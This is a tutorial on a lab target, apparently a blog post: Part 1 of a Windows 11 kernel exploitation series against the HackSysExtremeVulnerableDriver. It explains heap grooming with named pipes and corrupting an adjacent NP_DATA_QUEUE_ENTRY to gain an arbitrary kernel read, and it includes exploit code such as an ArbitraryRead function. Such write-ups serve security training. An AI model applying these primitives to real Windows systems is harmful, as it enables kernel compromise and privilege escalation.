Windows 11 x64 Kernel Exploitation - NonPaged Pool Overflow using HEVD – Part 1: Arbitrary Read

This blog series will demonstrate exploitation of a NonPaged pool overflow in the kernel low fragmentation heap (kLFH) to achieve an arbitrary read/write primitive and escalate privileges to SYSTEM.

Part 0x00 - The Setup

I wanted to make things challenging, so I am using two fully up-to-date (as of the 22nd of March 2025) Windows 11 24H2 (Build 26100.3476) virtual machines.

The debuggee is running the latest version (commit b1cc756) of the HackSysExtremeVulnerableDriver. The debugger is running WinDbg.

Part 0x01 - The Vulnerability



The vulnerable code will allocate 496 bytes in the NonPagedPoolNx using ExAllocatePoolWithTag. It will then, after doing some error checking, use RtlCopyMemory (which is really just memcpy in this case) to copy a user-controlled number of bytes into the KernelBuffer from the UserBuffer.

Because the Size in the RtlCopyMemory is not bounds checked, a pool overflow occurs. This allows an attacker to overwrite memory in the kLFH.



The diagram below can be used to determine how an allocation is handled, and shows that an allocation of 496 bytes will be handled by the kLFH.



The kLFH allocation sizes are distributed to buckets. This is incredibly important, because we can only overwrite memory in the bucket where the vulnerable allocation occurs. So, we essentially need to cause the kernel to allocate some useful object adjacent to our vulnerable allocation, and overwrite it in some meaningful way. A bucket is (generally) activated on the 17th active allocation; before that, allocations are stored in a VS subsegment. All allocations in the kLFH have a 16-byte (0x10) header, which contributes to the total allocation size used to determine which bucket gets used.

Part 0x02 - What Object to Use

We are going to get uncomfortably familiar with the internals of named pipes, starting with the NP_DATA_QUEUE_ENTRY. These structures are 99% undocumented, so we have to trust the Internet on their layout and size. We can create NP_DATA_QUEUE_ENTRY objects in the NonPaged pool by calling WriteFile on a named pipe. Even better, we can control the size of the NP_DATA_QUEUE_ENTRY with nNumberOfBytesToWrite. The Data member of the NP_DATA_QUEUE_ENTRY will contain the data from lpBuffer that WriteFile wrote.

The NP_DATA_QUEUE_ENTRY has an EntryType which can be:

- Buffered (EntryType is 0)
- Unbuffered (EntryType is 1)

Using WriteFile as described above creates buffered entries. An unbuffered entry, as the name implies, doesn't store the data with the queue entry; the data is instead stored in Irp->AssociatedIrp.SystemBuffer.

    typedef struct _NP_DATA_QUEUE_ENTRY {
        LIST_ENTRY NextEntry;
        IRP* Irp;
        PVOID SecurityContext;
        ULONG EntryType;
        ULONG QuotaInEntry;
        ULONG DataSize;
        ULONG Reserved;
        char Data[];
    } NP_DATA_QUEUE_ENTRY;

The vulnerable code allocates 496 (0x1F0) bytes in the NonPaged pool. Every allocation in the kLFH has a 16-byte (0x10) POOL_HEADER. So, the total allocation size is 512 (0x200) bytes. That's such a nice round number.

An NP_DATA_QUEUE_ENTRY is 48 (0x30) bytes, and with the 16-byte (0x10) POOL_HEADER that's 64 (0x40) bytes. So we need to write 512 - 64 = 448 bytes in the WriteFile call to cause an allocation of 512 (0x200) bytes that goes into the same bucket as the vulnerable allocation.
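The size arithmetic above can be checked with a small, portable sketch. The type and function names here (`DQE_HEADER_SKETCH`, `chunk_size`, `pipe_write_size`) are made up for illustration, and the layout assumes x64 pointer sizes and the community-documented structure shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed x64 layout; field names follow the structure shown above. */
typedef struct { uint64_t Flink, Blink; } LIST_ENTRY64_SKETCH;

typedef struct {
    LIST_ENTRY64_SKETCH NextEntry;  /* 16 bytes */
    uint64_t Irp;                   /* pointer-sized on x64 */
    uint64_t SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t Reserved;
    /* char Data[] follows this header in the real entry */
} DQE_HEADER_SKETCH;

enum { POOL_HEADER_SIZE = 0x10 };

static_assert(sizeof(DQE_HEADER_SKETCH) == 0x30,
              "entry header is expected to be 48 bytes");

/* Total chunk size for a pool request, including the POOL_HEADER. */
static size_t chunk_size(size_t request) {
    return request + POOL_HEADER_SIZE;
}

/* Bytes to pass to WriteFile so the queue entry fills a chunk of `target` bytes. */
static size_t pipe_write_size(size_t target) {
    return target - POOL_HEADER_SIZE - sizeof(DQE_HEADER_SKETCH);
}
```

Calling `pipe_write_size(chunk_size(496))` reproduces the 448 bytes derived above.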

Part 0x03 - Heap Grooming







In practice, we want to create about 10000 of these, and in the last 5000, but not the last few hundred, free roughly every 64th one (so it looks like the diagram below). The reason you NEVER want to free any in the first few thousand is that they fill any existing holes and keep the bucket derandomized.

That way, when the vulnerable allocation happens, it will hopefully slot in directly before one of our NP_DATA_QUEUE_ENTRY objects. The overflow will then corrupt the POOL_HEADER and NP_DATA_QUEUE_ENTRY of that adjacent chunk, which will be called the "overwritten chunk".
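The hole-punching pattern can be sketched as a pure index calculation. This is only a planning helper under assumed numbers: `GroomPlan` and its functions are hypothetical names, and the tail guard of 300 is a guess at "the last few hundred". In a real exploit, freeing an entry would mean closing or draining the corresponding pipe.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct {
    size_t total;       /* pipes sprayed, e.g. 10000 */
    size_t first_hole;  /* index where hole punching starts, e.g. 5000 */
    size_t tail_guard;  /* trailing pipes that are never freed (assumed 300) */
    size_t stride;      /* free every Nth pipe, e.g. 64 */
} GroomPlan;

/* True if pipe `i` should be freed to leave a hole for the vulnerable chunk. */
static bool groom_should_free(const GroomPlan *p, size_t i) {
    assert(p->stride > 0 && p->tail_guard <= p->total);
    if (i < p->first_hole) return false;               /* keep the early spray intact */
    if (i >= p->total - p->tail_guard) return false;   /* keep the tail intact */
    return (i - p->first_hole) % p->stride == 0;
}

/* Number of holes the plan produces. */
static size_t groom_count_holes(const GroomPlan *p) {
    size_t holes = 0;
    for (size_t i = 0; i < p->total; i++)
        holes += groom_should_free(p, i) ? 1 : 0;
    return holes;
}
```

With the numbers above, the plan leaves a few dozen isolated holes, each surrounded by live NP_DATA_QUEUE_ENTRY chunks.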

Part 0x04 - What data do we want to overwrite?

Using our overflow, we are going to corrupt a POOL_HEADER and NP_DATA_QUEUE_ENTRY to set the NP_DATA_QUEUE_ENTRY's DataSize value to 512 (the size of the Data buffer + sizeof(POOL_HEADER) + sizeof(NP_DATA_QUEUE_ENTRY), i.e. 448 + 16 + 48). As a result, the named pipe using that NP_DATA_QUEUE_ENTRY will be able to read 512 bytes (instead of 448), which lets it read into the chunk adjacent to the overwritten chunk. This will be referred to as the "readable chunk".
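As a rough sketch of what the overflow buffer could look like: 496 bytes of padding for the vulnerable allocation, then a replacement POOL_HEADER, then a replacement entry header with the enlarged DataSize. The offsets assume the x64 layout shown earlier, `build_overflow` is a hypothetical helper, and the caller is assumed to supply plausible header bytes, since the real header contents matter to the pool allocator.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    VULN_ALLOC_SIZE  = 0x1F0,  /* bytes requested by the vulnerable code */
    POOL_HEADER_SIZE = 0x10,
    DQE_HEADER_SIZE  = 0x30,
    DQE_DATASIZE_OFF = 0x28,   /* offset of DataSize in the entry (assumed layout) */
    OVERFLOW_SIZE    = VULN_ALLOC_SIZE + POOL_HEADER_SIZE + DQE_HEADER_SIZE
};

/* Fill `out` (OVERFLOW_SIZE bytes) with padding, a replacement pool header,
   and a replacement queue entry header whose DataSize is `data_size`. */
static void build_overflow(uint8_t *out, const uint8_t *pool_header,
                           const uint8_t *dqe_header, uint32_t data_size) {
    memset(out, 'A', VULN_ALLOC_SIZE);                    /* fills our own chunk */
    memcpy(out + VULN_ALLOC_SIZE, pool_header, POOL_HEADER_SIZE);

    uint8_t *dqe = out + VULN_ALLOC_SIZE + POOL_HEADER_SIZE;
    memcpy(dqe, dqe_header, DQE_HEADER_SIZE);
    memcpy(dqe + DQE_DATASIZE_OFF, &data_size, sizeof data_size);
}
```

The resulting buffer is 560 bytes long, and passing 512 as `data_size` places that value 552 bytes into the buffer, on top of the neighbouring entry's DataSize field.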



Because named pipes allow multiple writes without reading, these entries (buffered or unbuffered) must be saved somehow. The Windows kernel uses a linked list in which each entry points to the next through NP_DATA_QUEUE_ENTRY->NextEntry.Flink (the forward link). The Context Control Block (CCB), in the context of NPFS, is an undocumented structure used to hold information about a particular server/client connection. The CCB contains a DATA_QUEUE structure which holds information about the saved entries and points to the first entry in the linked list. The last entry in the linked list points back to the DATA_QUEUE.

The NP_DATA_QUEUE_ENTRY->NextEntry.Flink pointer in the “readable chunk” is pointing to the DATA_QUEUE in the CCB structure. This is because there is only a single NP_DATA_QUEUE_ENTRY in the queue (created from the WriteFile). If more NP_DATA_QUEUE_ENTRY objects are added, the Flink will point to the next entry instead of the DATA_QUEUE object like so:

(Source: https://github.com/vportal/HEVD)

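The circular list behaviour described above can be reproduced in a few lines. This is a minimal stand-in modelled on the semantics of the kernel's InitializeListHead and InsertTailList; `ListEntry`, `list_init` and `list_insert_tail` are illustrative names, not NPFS code.

```c
#include <assert.h>
#include <stddef.h>

typedef struct ListEntry {
    struct ListEntry *Flink;  /* forward link */
    struct ListEntry *Blink;  /* backward link */
} ListEntry;

/* An empty list head points at itself in both directions. */
static void list_init(ListEntry *head) {
    head->Flink = head;
    head->Blink = head;
}

/* Append `e` so that the last entry's Flink always points back to the head. */
static void list_insert_tail(ListEntry *head, ListEntry *e) {
    e->Flink = head;
    e->Blink = head->Blink;
    head->Blink->Flink = e;
    head->Blink = e;
}
```

With a single entry queued, that entry's Flink is the address of the queue head and the head's Flink is the address of the entry. Once a second entry is appended, the first entry's Flink points at the second instead.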

In the “overwritten chunk” we will also overwrite the Flink (and Blink) to point to a userland NP_DATA_QUEUE_ENTRY. The userland NP_DATA_QUEUE_ENTRY contains a pointer to an IRP that is also allocated in userland. This is allowed because SMAP is only enabled at IRQL 2 or higher.

To achieve an arbitrary read primitive, the userland NP_DATA_QUEUE_ENTRY and IRP can be set up as an unbuffered entry.

By reading (using PeekNamedPipe, because we don’t want any objects to be freed) more bytes than the DataSize in the overwritten chunk, the NPFS driver will follow the Flink to the userland NP_DATA_QUEUE_ENTRY, notice it’s an unbuffered entry, and read from Irp->AssociatedIrp.SystemBuffer, which is a value we control.
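The following is a toy model of that walk, written for illustration only. It is not the NPFS implementation: `FakeIrp`, `Entry` and `model_peek` are hypothetical, and the logic simply encodes the behaviour described above (buffered entries are read from Data, unbuffered ones from the IRP's SystemBuffer).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct ListEntry { struct ListEntry *Flink, *Blink; } ListEntry;
typedef struct { void *SystemBuffer; } FakeIrp;  /* only the field we need */

typedef struct {
    ListEntry NextEntry;
    FakeIrp  *Irp;
    void     *SecurityContext;
    uint32_t  EntryType;      /* 0 = buffered, 1 = unbuffered */
    uint32_t  QuotaInEntry;
    uint32_t  DataSize;
    uint32_t  Reserved;
    unsigned char Data[];     /* inline data for buffered entries */
} Entry;

/* Simplified peek: walk the queue from its head and copy each entry's bytes
   until `len` bytes are gathered or the list wraps back to the head. */
static size_t model_peek(ListEntry *head, unsigned char *out, size_t len) {
    size_t done = 0;
    for (ListEntry *l = head->Flink; l != head && done < len; l = l->Flink) {
        Entry *e = (Entry *)l;  /* NextEntry is the first member */
        const unsigned char *src =
            (e->EntryType == 1) ? e->Irp->SystemBuffer : e->Data;
        size_t n = e->DataSize < len - done ? e->DataSize : len - done;
        memcpy(out + done, src, n);
        done += n;
    }
    return done;
}
```

In this model, asking for no more than the first entry's DataSize never touches the second entry. Asking for more makes the walk continue through Flink, and if that entry is unbuffered, the bytes come from whatever address SystemBuffer holds.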

Part 0x05 - Finding the “overwritten chunk”?

Assuming the pool overflow did successfully corrupt a NP_DATA_QUEUE_ENTRY as described, how do we find it? We created 10000 named pipes! Which one of them uses the overwritten NP_DATA_QUEUE_ENTRY?

The answer is PeekNamedPipe.

"Copies data from a named or anonymous pipe into a buffer without removing it from the pipe." (Microsoft documentation)

We wrote 448 bytes to every named pipe to create their respective NP_DATA_QUEUE_ENTRY objects in the NonPaged pool. We set the NP_DATA_QUEUE_ENTRY->DataSize to 512 (read the first sentence of Part 0x04 if you forgot why) on the overwritten NP_DATA_QUEUE_ENTRY. If we call PeekNamedPipe with a buffer size of 512 on all 10000 named pipes, only one will return more than 448 bytes. That allows us to identify the corrupted named pipe.
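The search loop might look like the sketch below. To keep it portable, the actual PeekNamedPipe call is hidden behind a hypothetical callback type `peek_fn` that returns the number of bytes read; `demo_peek` is a stand-in that pretends pipe 7 is the corrupted one. A pipe that yields more than the 448 bytes we wrote must be using the corrupted entry.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical callback: peeks up to `len` bytes from pipe `index` into `buf`
   and returns the number of bytes actually read (0 on failure). */
typedef size_t (*peek_fn)(size_t index, void *buf, size_t len);

enum { WRITTEN_SIZE = 448, CORRUPTED_SIZE = 512 };

/* Returns the index of the first pipe that yields more than WRITTEN_SIZE
   bytes, or `count` if none does. `leak` must hold CORRUPTED_SIZE bytes and
   ends up containing the out-of-bounds data of the matching pipe. */
static size_t find_corrupted_pipe(peek_fn peek, size_t count, void *leak) {
    for (size_t i = 0; i < count; i++) {
        if (peek(i, leak, CORRUPTED_SIZE) > WRITTEN_SIZE)
            return i;
    }
    return count;
}

/* Stand-in for illustration only: pipe 7 reports the enlarged DataSize. */
static size_t demo_peek(size_t index, void *buf, size_t len) {
    (void)buf;
    size_t available = (index == 7) ? CORRUPTED_SIZE : WRITTEN_SIZE;
    return len < available ? len : available;
}
```

In a real exploit the callback would wrap PeekNamedPipe on the handle array created during the spray, and a return value equal to `count` would mean the groom missed and should be retried.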

It's important to save the out-of-bounds (OOB) read data, because that is our "readable chunk".

Part 0x06 - Arbitrary Read

All we have to do is call PeekNamedPipe with a size greater than 512, and the kernel will follow the Flink (which we control) on the corrupted NP_DATA_QUEUE_ENTRY to the userland NP_DATA_QUEUE_ENTRY that we control and can modify. By setting EntryType to 1 (unbuffered), the kernel will read from the Irp->AssociatedIrp.SystemBuffer. We set the SystemBuffer to the address we want to read. We also set DataSize to the number of bytes we want to read.

    void ArbitraryRead(NP_DATA_QUEUE_ENTRY* usermodeDqe, PVOID addr, u32 size, PVOID result) {
        // The peek returns the corrupted entry's bytes first, then the target data.
        const u32 prefix = NAME_PIPE_BUF_SIZE + sizeof(POOL_HEADER) + sizeof(NP_DATA_QUEUE_ENTRY);
        const u32 bufSize = prefix + size;
        char* tempBuf = (char*)VirtualAlloc(NULL, bufSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (tempBuf == NULL) return;

        // Point the fake unbuffered entry at the address we want to read.
        usermodeDqe->Irp->AssociatedIrp.SystemBuffer = addr;
        usermodeDqe->SecurityContext = 0;
        usermodeDqe->EntryType = 1;
        usermodeDqe->QuotaInEntry = 0;
        usermodeDqe->DataSize = size;

        PeekNamedPipe(hVulnReadPipe, tempBuf, bufSize, NULL, NULL, NULL);
        // Skip the prefix; the requested bytes follow it.
        memcpy(result, &tempBuf[prefix], size);
        VirtualFree(tempBuf, 0, MEM_RELEASE);
    }

This is a very nice arbitrary read. We are not even limited by size; we could read, say, 50MB of kernel memory in a single syscall if we wanted. At the moment, though, because we are on 24H2, we haven’t even broken kASLR and don’t know many valid addresses.

An interesting thing to know would be the address of the “readable chunk” NP_DATA_QUEUE_ENTRY object. We know its contents but not its address in memory. The "readable chunk" NP_DATA_QUEUE_ENTRY has an Flink which is a pointer to an NP_DATA_QUEUE, which looks like this:

    typedef struct _NP_DATA_QUEUE {
        LIST_ENTRY Queue;
        ULONG QueueState;
        ULONG BytesInQueue;
        ULONG EntriesInQueue;
        ULONG Quota;
        ULONG QuotaUsed;
        ULONG ByteOffset;
        u64 queueTailAddr;
        u64 queueTail;
    } NP_DATA_QUEUE, *PNP_DATA_QUEUE;

Remember the "readable chunk" Flink points to the NP_DATA_QUEUE because there are no other entries. The first member of the NP_DATA_QUEUE is an Flink back to the NP_DATA_QUEUE_ENTRY.

So if we read the first 8 bytes of the NP_DATA_QUEUE, that will be a pointer to our "readable chunk" NP_DATA_QUEUE_ENTRY.

    u64 readableChunkDQEAddr = 0;
    ArbitraryRead(&dqe, (PVOID)readableChunkDQE->NextEntry.Flink, 8, &readableChunkDQEAddr);

Because we know the "overwritten chunk" and "readable chunk" are adjacent in memory, we can calculate the address of the "overwritten chunk" too.

    u64 overwrittenChunkDQEAddr = (u64)readableChunkDQEAddr - sizeof(POOL_HEADER) - VULN_CHUNK_SIZE;
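The subtraction only works out if VULN_CHUNK_SIZE is the 496-byte (0x1F0) body rather than the 0x200 total. That is an assumption here, since the constant's definition is not shown. Under that assumption, the two terms add up to exactly one 0x200-byte chunk stride, as this small sketch with a hypothetical helper name and a made-up address shows:

```c
#include <assert.h>
#include <stdint.h>

enum {
    POOL_HEADER_SIZE = 0x10,
    VULN_CHUNK_SIZE  = 0x1F0  /* assumed: the 496-byte body, not the 0x200 total */
};

/* Address of the queue entry in the chunk immediately before `dqe_addr`,
   given that chunks in this bucket are laid out back to back. */
static uint64_t previous_chunk_dqe(uint64_t dqe_addr) {
    return dqe_addr - POOL_HEADER_SIZE - VULN_CHUNK_SIZE;
}
```

For example, an entry at the made-up address 0xFFFF800012340210 would place the previous chunk's entry at 0xFFFF800012340010, exactly 0x200 bytes lower.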